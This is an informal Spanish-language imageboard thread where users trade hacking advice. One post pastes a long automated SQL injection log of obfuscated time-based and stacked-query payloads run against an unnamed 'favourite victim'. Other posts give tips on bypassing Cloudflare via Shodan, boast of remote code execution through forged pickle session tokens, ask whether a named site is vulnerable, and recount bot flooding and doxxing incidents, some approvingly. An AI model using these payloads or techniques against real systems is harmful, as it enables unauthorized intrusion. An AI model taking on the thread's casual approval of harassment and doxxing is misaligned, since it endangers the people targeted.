1 Nombre: Murciélago 30-10-2025 (Thu) 21:47:14 [del]
¿Qué les gustaría hacer? Yo puedo enseñarles de todo.
2 Nombre: Murciélago 30-10-2025 (Thu) 23:45:12 [del]
Necesito billete bro. Crees que puedes ayudarme con eso?
4 Nombre: Murciélago 31-10-2025 (Fri) 01:55:22 [del]
Ayuda a la chica de valle del cauca que decian que abusaban de ella. O al menos llegar al fondo de eso
5 Nombre: Grozny 31-10-2025 (Fri) 02:30:48 [del]
>>1
¿Qué cuentas, oculto de internet? Yo tengo un problema de ser consistente con las cosas, no tiene nada que ver, pero tambien sé algo de hacking ético.
¿Qué tanto sabes de hacking?
¿Eres consistente con lo que haces?
6 Nombre: Murciélago 31-10-2025 (Fri) 05:46:54 [del]
>>5
Sí, soy consciente. Actualmente es mi oficio así que es mi deber ser ético. Aunque si ustedes lo prefieren, puedo ser oscuro.
Estoy en un nivel medio aún, aunque sé muchas cosas que te podrían interesar que ninguna IA te contará. Cuéntame que necesitas saber y yo puedo hacer el intento de hacer (siempre y cuando no implique dinero). OSINT.... Búsqueda de vulnerabilidades en sitios web.... Ingeniería socual....... Un montón de cosas.
>>4
¿Qué pasó, y dónde?
7 Nombre: Murciélago 31-10-2025 (Fri) 14:05:15 [del]
>>6
https://vampiros.org/read/internet/1746545699
Detalles aqui
8 Nombre: Grozny 31-10-2025 (Fri) 14:50:03 [del]
>>6
¿Conoces como puedo hallar vulnerabilidades a una web hecha con flask, nodejs y express? Tambien tiene cloudflare, y no he encontrado vulnerabilidades de las papas esas: xss, rce, etc
O en general
¿Alguna guia para hallar vulnerabilidades a una web?
9 Nombre: h4x01r!!2DxEgivPPfxGeeZ 07-11-2025 (Fri) 13:46:38 [del]
>>7
Podría intentar ponerme en contacto con esa persona pero no tengo ni su correo personal ni nada para hacerlo. Desde ahora usaré el tripcode "h4x01r" para que me reconozcan. Ahí escribí en el hilo en caso de que aparezca para ayudarlo en lo que sea necesario.
>>8
Puedes usar herramientas como zap, nuclei en kali, etc para buscar vulnerabilidades web. Si tiene cloudflare, usa shodan para obtener la IP real del sitio y bypassear el firewall de cloudflare.
Te recomiendo estos tutoriales para aprender sobre ataques xss, inyección etc..
Les dejo cursos interesantes donde comprenderán varios aspectos
Curso de hacking web general , acá podrán encontrar varios tipos de ataques que se pueden aprender
https://drive.google.com/drive/u/1/folders/1KPgjM1TOVmVJTWmkNvNddWYkkEzE9X6B
Hacking a Redes WiFi
https://drive.google.com/drive/u/0/folders/1AEDQgmOcOzKGvrzhcLxMQXD-Ns0WScxc
10 Nombre: Murciélago 09-11-2025 (Sun) 02:32:23 [del]
>>9
Pero podrias investigar a las otras personas. Asi llegarias al fondo de todo esto
12 Nombre: Murciélago 11-12-2025 (Thu) 00:04:48 [del]
>>11
Con Nmap no haremos nada útil si no hacemos un mapeo de los Endpoints, APIs, etc etc de la web a destino. Solo podremos hallar un puerto tipo 3000 y cer si el backend usa Express, flask o cualquier cosa. Yo a veces clono honeypots de la deep web con PHP para aprender y ver que vulnerabilidades me quieren explotar para hacer mis trampas cada vez más poderosas :D!
13 Nombre: Murciélago 16-12-2025 (Tue) 02:04:05 [del]
[23:01:38] [PAYLOAD] gal';(SELEct/**/*/**/FrOM/**/(SELEct(sleeP(5)))bfaQ)#
[23:01:40] [PAYLOAD] gal');(sELECT/**/*/**/FROm/**/(sELECT(SlEeP(5)))bfaQ)#
[23:01:41] [PAYLOAD] gal'));(sElECT/**/*/**/fROm/**/(sElECT(SlEeP(5)))bfaQ)#
[23:01:43] [PAYLOAD] gal')));(SelEct/**/*/**/FRoM/**/(SelEct(sLEEP(5)))bfaQ)#
[23:01:45] [PAYLOAD] gal%';(SelEcT/**/*/**/FRom/**/(SelEcT(sleeP(5)))bfaQ)#
[23:01:46] [PAYLOAD] gal");(sELEct/**/*/**/fRoM/**/(sELEct(SleEp(5)))bfaQ)#
[23:01:47] [PAYLOAD] gal"));(SeLECt/**/*/**/fROm/**/(SeLECt(SLeeP(5)))bfaQ)#
[23:01:49] [PAYLOAD] gal";(sElect/**/*/**/FROm/**/(sElect(SLeEP(5)))bfaQ)#
[23:01:50] [PAYLOAD] gal);(SELeCt/**/*/**/From/**/(SELeCt(sLeep(5)))bfaQ)#
[23:01:52] [PAYLOAD] gal));(sElEcT/**/*/**/frOm/**/(sElEcT(sLeep(5)))bfaQ)#
[23:01:54] [PAYLOAD] gal)));(seLECT/**/*/**/fRoM/**/(seLECT(SLeEP(5)))bfaQ)#
[23:01:55] [PAYLOAD] gal;(SelEcT/**/*/**/FrOm/**/(SelEcT(SLeep(5)))bfaQ)#
[23:01:58] [DEBUG] skipping test 'MySQL >= 5.0.12 stacked queries (query SLEEP)' because the level (4) is higher than the provided (3)
[23:01:58] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[23:01:58] [PAYLOAD] gal';seLEcT/**/BenChMArk(5000000,MD5(0x4b757666))#
[23:02:00] [PAYLOAD] gal');SELect/**/bENcHMaRK(5000000,MD5(0x4b757666))#
[23:02:02] [PAYLOAD] gal'));SelECT/**/BenchMark(5000000,MD5(0x4b757666))#
[23:02:03] [PAYLOAD] gal')));SEleCT/**/BEnCHMarK(5000000,MD5(0x4b757666))#
[23:02:05] [PAYLOAD] gal%';sELeCT/**/BeNchmArK(5000000,MD5(0x4b757666))#
[23:02:06] [PAYLOAD] gal");SElECT/**/BenchMArk(5000000,MD5(0x4b757666))#
[23:02:07] [PAYLOAD] gal"));SelEcT/**/BeNChmARk(5000000,MD5(0x4b757666))#
[23:02:09] [PAYLOAD] gal";Select/**/beNChmaRk(5000000,MD5(0x4b757666))#
[23:02:10] [PAYLOAD] gal);sEleCT/**/beNCHMArk(5000000,MD5(0x4b757666))#
[23:02:11] [PAYLOAD] gal));sElECt/**/BEncHmArK(5000000,MD5(0x4b757666))#
[23:02:13] [PAYLOAD] gal)));SELECt/**/bEnCHmarK(5000000,MD5(0x4b757666))#
[23:02:15] [PAYLOAD] gal;SelECT/**/beNChMarK(5000000,MD5(0x4b757666))#
[23:02:16] [DEBUG] skipping test 'MySQL < 5.0.12 stacked queries (BENCHMARK)' because the level (5) is higher than the provided (3)
[23:02:16] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[23:02:16] [PAYLOAD] gal';sELeCT/**/Pg_SlEEP(5)--
[23:02:17] [PAYLOAD] gal');selecT/**/pg_SLEEp(5)--
[23:02:21] [PAYLOAD] gal'));SeLECT/**/pg_SLeeP(5)--
[23:02:22] [PAYLOAD] gal')));SELecT/**/pg_SLeeP(5)--
[23:02:24] [PAYLOAD] gal%';sElecT/**/pG_sLEEP(5)--
[23:02:26] [PAYLOAD] gal");SElect/**/Pg_SLeep(5)--
[23:02:33] [PAYLOAD] gal"));SeLECt/**/pg_sLEEp(5)--
[23:02:34] [PAYLOAD] gal";SELEcT/**/pg_sleEP(5)--
[23:02:36] [PAYLOAD] gal);SeLEcT/**/pG_slEeP(5)--
[23:02:37] [PAYLOAD] gal));selEcT/**/Pg_sLeEp(5)--
[23:02:38] [PAYLOAD] gal)));SeleCt/**/pG_sLEEP(5)--
[23:02:39] [PAYLOAD] gal;SElect/**/pG_SleEP(5)--
[23:02:40] [DEBUG] skipping test 'PostgreSQL > 8.1 stacked queries' because the level (4) is higher than the provided (3)
[23:02:40] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
[23:02:40] [PAYLOAD] gal';selecT/**/CouNT(*)/**/FRoM/**/gENerate_SERIeS(1,5000000)--
[23:02:42] [PAYLOAD] gal');SelECT/**/couNT(*)/**/fROm/**/GeNeRATE_SERiEs(1,5000000)--
[23:02:44] [PAYLOAD] gal'));sElect/**/CouNT(*)/**/fROM/**/GENeRAte_SErIes(1,5000000)--
[23:02:45] [PAYLOAD] gal')));SELeCt/**/coUNt(*)/**/frOM/**/GEneRaTE_SERiEs(1,5000000)--
[23:02:46] [PAYLOAD] gal%';SELECt/**/cOUNT(*)/**/FrOM/**/GENerAte_seriES(1,5000000)--
[23:02:48] [PAYLOAD] gal");sElEcT/**/counT(*)/**/FrOm/**/gENeRaTE_sERies(1,5000000)--
[23:02:49] [PAYLOAD] gal"));seLecT/**/COunT(*)/**/FRom/**/gENErATE_SERies(1,5000000)--
[23:02:55] [PAYLOAD] gal";SelecT/**/CounT(*)/**/frOM/**/genERAte_SeRies(1,5000000)--
[23:02:56] [PAYLOAD] gal);SeLEcT/**/CounT(*)/**/froM/**/genERaTe_sERIes(1,5000000)--
[23:02:57] [PAYLOAD] gal));sElECt/**/CoUNT(*)/**/fROm/**/gEneRATe_sERieS(1,5000000)--
[23:03:00] [PAYLOAD] gal)));SeLeCt/**/Count(*)/**/FRom/**/GENERate_serIes(1,5000000)--
[23:03:02] [PAYLOAD] gal;selecT/**/couNt(*)/**/FROm/**/gENERatE_seRiEs(1,5000000)--
[23:03:03] [DEBUG] skipping test 'PostgreSQL stacked queries (heavy query)' because the level (5) is higher than the provided (3)
[23:03:03] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[23:03:03] [PAYLOAD] gal';CREaTe/**/Or/**/RePlacE/**/functIon/**/SleeP(INt)/**/RETurns/**/INt/**/aS/**/'/lib/libc.so.6','sLEeP'/**/lANguAgE/**/'C'/**/STRICT;/**/SElecT/**/sLEeP(5)--
[23:03:07] [PAYLOAD] gal');CrEatE/**/oR/**/RePlACe/**/fUNcTiOn/**/SLeEP(inT)/**/rETuRns/**/inT/**/As/**/'/lib/libc.so.6','SlEep'/**/lAnguAge/**/'C'/**/STRICT;/**/SELecT/**/SlEep(5)--
[23:03:08] [PAYLOAD] gal'));CrEatE/**/Or/**/REPLace/**/fuNCTIon/**/sLEEp(iNT)/**/rEtuRNs/**/iNT/**/As/**/'/lib/libc.so.6','sleeP'/**/LANgUagE/**/'C'/**/STRICT;/**/selecT/**/sleeP(5)--
[23:03:09] [PAYLOAD] gal')));Create/**/oR/**/rePLACE/**/FuNCTIon/**/slEep(inT)/**/rEtuRNS/**/inT/**/aS/**/'/lib/libc.so.6','slEeP'/**/LANguAGE/**/'C'/**/STRICT;/**/SElECt/**/slEeP(5)--
[23:03:10] [PAYLOAD] gal%';cReatE/**/oR/**/rEPlAcE/**/FUncTion/**/sLEep(INt)/**/reTuRNs/**/INt/**/aS/**/'/lib/libc.so.6','sLeEP'/**/laNgUage/**/'C'/**/STRICT;/**/SeLeCT/**/sLeEP(5)--
[23:03:12] [PAYLOAD] gal");CreaTE/**/Or/**/rEPlace/**/fuNCtION/**/SLeEP(inT)/**/RETUrnS/**/inT/**/aS/**/'/lib/libc.so.6','SleEP'/**/lAnGuage/**/'C'/**/STRICT;/**/sELeCT/**/SleEP(5)--
[23:03:13] [PAYLOAD] gal"));creatE/**/Or/**/rEPLacE/**/FuNCTIOn/**/sleEP(iNt)/**/reTuRNs/**/iNt/**/aS/**/'/lib/libc.so.6','slEEP'/**/lANgUaGe/**/'C'/**/STRICT;/**/SelECT/**/slEEP(5)--
[23:03:15] [PAYLOAD] gal";creATE/**/oR/**/ReplAce/**/FUnCtiOn/**/sLeeP(InT)/**/ReturnS/**/InT/**/As/**/'/lib/libc.so.6','SleEP'/**/LanGUAGe/**/'C'/**/STRICT;/**/sElEcT/**/SleEP(5)--
[23:03:16] [PAYLOAD] gal);creATe/**/oR/**/repLAce/**/fuNcTIon/**/Sleep(INt)/**/ReTURNs/**/INt/**/aS/**/'/lib/libc.so.6','slEeP'/**/lANGUAGe/**/'C'/**/STRICT;/**/seLect/**/slEeP(5)--
Estoy haciendo un ataque de inyeción SQL para ver si encuentro alguna vulnerabilidad
14 Nombre: Murciélago 16-12-2025 (Tue) 02:04:51 [del]
>>13
Estoy experimentando con mi víctima preferida
15 Nombre: Murciélago 16-12-2025 (Tue) 02:13:05 [del]
>>14
Oh querido, primero tienes que bypassear y mapear la web, si tiene cloudflare o no, si usa tecnologias desactualizadas o no.
Muy dificil hallar una sql ciega o no ciega hoy en dia porque casi todos usan php o lo que sea actualizados, y digamos el hardening es complejo, y cualquier dev con dos dedos de frente saber mitigar y sanitizar todo lo que el user coloque en los inputs para evitar xss o rce, y si usan tokens de sesion, validar que los genera la web para evitar un RCE
curiosidad: una vez le hice un rce a una pagina scam en la deep web porque podias meter lo que sea con burp suite en los tokens de inicio de sesion, solo tenias que cifrar tu codigo con pickle en base64 y ya xdxdxd
pd: si quieres hallar una vulnerabilidad en una web, tal vez lo mejor sea leer sobre ingenieria social para ver donde fallamos nosotros los bipedos
16 Nombre: Murciélago 16-12-2025 (Tue) 02:24:49 [del]
>>15
esta web será vulnerable?
https://omaera.org
17 Nombre: Murciélago 16-12-2025 (Tue) 02:40:06 [del]
>>12
Manda el dato de los honeypots para clonarlos igual..
18 Nombre: Murciélago 16-12-2025 (Tue) 04:01:04 [del]
Que páginas buenas de hacking hay en la deep web?
19 Nombre: Murciélago 16-12-2025 (Tue) 06:06:48 [del]
Hay una playlist buena en youtube u otras plataformas para saberle bien al docker?
20 Nombre: Séitan 16-12-2025 (Tue) 14:35:48 [del]
Podrían hackear al troll que postea cp, me parece lo más ético que puede hacer el hacker por el sitio y por la humanidad. Hace casi una hora que está ese hilo ahí.
21 Nombre: Murciélago 17-12-2025 (Wed) 22:35:18 [del]
>>19
hace poco encontre a uno que hackeo a rouzed y mostraba su cara enseñando en ytb las vulneralidades de la pagina
22 Nombre: Murciélago 18-12-2025 (Thu) 00:04:29 [del]
>>21
Pasa
Rouzed o rouzed? Son distintos, y sí, rozrd tiene pésima seguridad anti bots, llegué a hacerme 1 billón de monedas con unos bots que solo copiaban y pegaban citas filosóficas en varios hilos para evitar que me los detectaran
23 Nombre: Murciélago 18-12-2025 (Thu) 00:05:30 [del]
>>19
La mejor forma de estudiar es leyendo mijo, vaya a https://z-library.sk y busque "Docker" y estudie mijo
24 Nombre: Murciélago 18-12-2025 (Thu) 00:55:18 [del]
>>22
Ahi lo encontre. Ni me pare a escuchar que habian pactado hacerlo con razon subio el video.
>>
25 Nombre: Murciélago 18-12-2025 (Thu) 01:39:30 [del]
>>24
Y de ahi que no hicieran quilombo los gordos
26 Nombre: Murciélago 18-12-2025 (Thu) 01:47:13 [del]
>>24
cualquiera con más de dos neuronas puedo hacer algo así, la clave del exito siempre será disciplina, autoestima y fe en uno mismo
27 Nombre: Murciélago 18-12-2025 (Thu) 01:57:51 [del]
>>26
Si, cualquiera. Pero el tema aca es que pense que lo hizo sin permiso y en esas paginas suele haber forobardo por cosas asi. O doxeos
28 Nombre: Murciélago 18-12-2025 (Thu) 02:12:29 [del]
>>27
nah, en esas paginas solo está el protagonista de memorias del subsuelo, gordos fracasados de entre 20-40 años sin ningun logro en la vida adictos a idolatrar a los culos jugandolas al pseudointelectual cuando ni derivar saben. Si sos argentino supongo sabés quien es Marilú, lo máximo que hicieron fue acosarla por telefono pero ni eso, cambiar de número y ya, y fue esta fracasada que jodió al gordo fracasado de atari (el dueño de rozed que curioso se fue porque se dio cuenta de lo fracasado que era estar 24/7 moderando rozed).
Solo 2 o 3 veces hubieron doxxeos así, uno fue cuando unos gordos se coordinaron para alquilar un camión de arena y descargarlo en la casa de Belizán KJJJJ, tambien le pusieron un candado a la reja y lo grabaron JJJJ
Del resto, hasta yo puedo ir y hacer una botnet para hacer con asyncio 5 bots por dispositivos y llenar la home de flood
Pero, es vanidad y pérdida de tiempo, si le pagaron al falucho ese, pues bien por el.
29 Nombre: Murciélago 18-12-2025 (Thu) 03:51:24 [del]
>>23
Si he estado leyendo documentación pero siempre viene bien algún apoyó en otro formato
30 Nombre: Murciélago 18-12-2025 (Thu) 14:45:16 [del]
>>28
Me fui antes de marilu pero masomenos se quien es. Lo de belizan no me hace gracia, puedo entender que doxearian a nimu coscu pero a ese gordo no. Atacar a alguien tan inofensivo es ponerse al nivel de las feminazis o npcs de los que se quejaban

